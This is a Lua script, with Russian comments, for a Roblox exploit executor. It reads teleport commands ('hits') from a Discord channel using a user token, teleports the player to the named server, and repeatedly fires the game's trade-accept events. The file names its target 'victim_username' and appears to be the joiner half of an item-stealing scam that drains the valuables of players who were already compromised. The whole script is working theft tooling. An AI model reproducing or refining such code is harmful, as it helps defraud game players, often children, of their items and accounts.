if not game:IsLoaded() then
    game.Loaded:Wait()
    print("✅ Игра загружена")
end

-- Проверка токена и ID канала
if token == "" or channelId == "" then
    game.Players.LocalPlayer:Kick("❌ Добавь токен и channelId в скрипт!")
    return
end

-- Anti-AFK
local VirtualUser = game:GetService('VirtualUser')
game:GetService('Players').LocalPlayer.Idled:Connect(function()
    VirtualUser:CaptureController()
    VirtualInputManager:SendMouseButtonEvent(0,0,0,true,game,0)
    task.wait(0.1)
    VirtualInputManager:SendMouseButtonEvent(0,0,0,false,game,0)
    print("🔄 Anti-AFK активирован")
end)

-- Настройки файлов
local HttpService = game:GetService("HttpService")
if not isfile("user.txt") then writefile("user.txt", "victim_username") end
if not isfile("joined_ids.txt") then writefile("joined_ids.txt", "[]") end

local victimUser = readfile("user.txt")
local joinedIds = HttpService:JSONDecode(readfile("joined_ids.txt"))
local isTeleporting = false

-- Улучшенный парсинг команды телепортации
local function findTeleportCommand(content)
    if not content then return nil, nil end
    
    -- Универсальный поиск (игнорирует лишние пробелы и кавычки)
    local patterns = {
        'TeleportService%s*:%s*TeleportToPlaceInstance%s*%(%s*(%d+)%s*,%s*["\']([%w%-]+)["\']',
        'game:GetService%s*%("TeleportService"%)%s*:%s*TeleportToPlaceInstance%s*%(%s*(%d+)%s*,%s*["\']([%w%-]+)["\']'
    }
    
    for _, pattern in ipairs(patterns) do
        local placeId, jobId = content:match(pattern)
        if placeId and jobId then
            return placeId, jobId
        end
    end
    
    return nil, nil
end

-- Основная функция проверки Discord
local function checkDiscord()
    local response = request({
        Url = "https://discord.com/api/v9/channels/"..channelId.."/messages?limit=10",
        Method = "GET",
        Headers = {
            ['Authorization'] = token,
            ['Content-Type'] = 'application/json'
        }
    })

    if not response.Success then
        warn("❌ Ошибка Discord API: "..tostring(response.StatusCode))
        return
    end

    local messages = HttpService:JSONDecode(response.Body)
    for _, msg in ipairs(messages) do
        if msg.content and msg.content:find("TeleportService") then
            print("\n🔍 Найдено сообщение с хитом! ID:", msg.id)
            print("📄 Content:", string.sub(msg.content, 1, 100).."...") -- Выводим часть контента
            
            local placeId, jobId = findTeleportCommand(msg.content)
            if placeId and jobId then
                print("🎯 Найдена команда телепортации:")
                print("   PlaceID:", placeId)
                print("   JobID:", jobId)
                
                if not table.find(joinedIds, msg.id) then
                    table.insert(joinedIds, msg.id)
                    writefile("joined_ids.txt", HttpService:JSONEncode(joinedIds))
                    
                    print("🚀 Телепортация на сервер...")
                    isTeleporting = true
                    local success, err = pcall(function()
                        game:GetService("TeleportService"):TeleportToPlaceInstance(tonumber(placeId), jobId)
                    end)
                    
                    if not success then
                        warn("❌ Ошибка телепортации:", err)
                        isTeleporting = false
                    end
                    return
                else
                    print("⚠️ Уже присоединялись к этому хиту")
                end
            else
                print("❌ Не найдена команда телепортации в content!")
                print("Проверь паттерны поиска в функции findTeleportCommand")
            end
        end
    end
end

-- Автопринятие трейдов
local function autoAcceptTrade()
    while task.wait(1) do
        pcall(function()
            game:GetService("ReplicatedStorage").Trade.AcceptRequest:FireServer()
            game:GetService("ReplicatedStorage").Trade.AcceptTrade:FireServer()
        end)
    end
end

-- Запуск
task.spawn(autoAcceptTrade)

print("✨ Скрипт запущен! Ожидание новых хитов...")
while task.wait(5) do
    if not isTeleporting then
        pcall(checkDiscord)
    else
        print("🔄 Ожидание завершения телепортации...")
    end
end
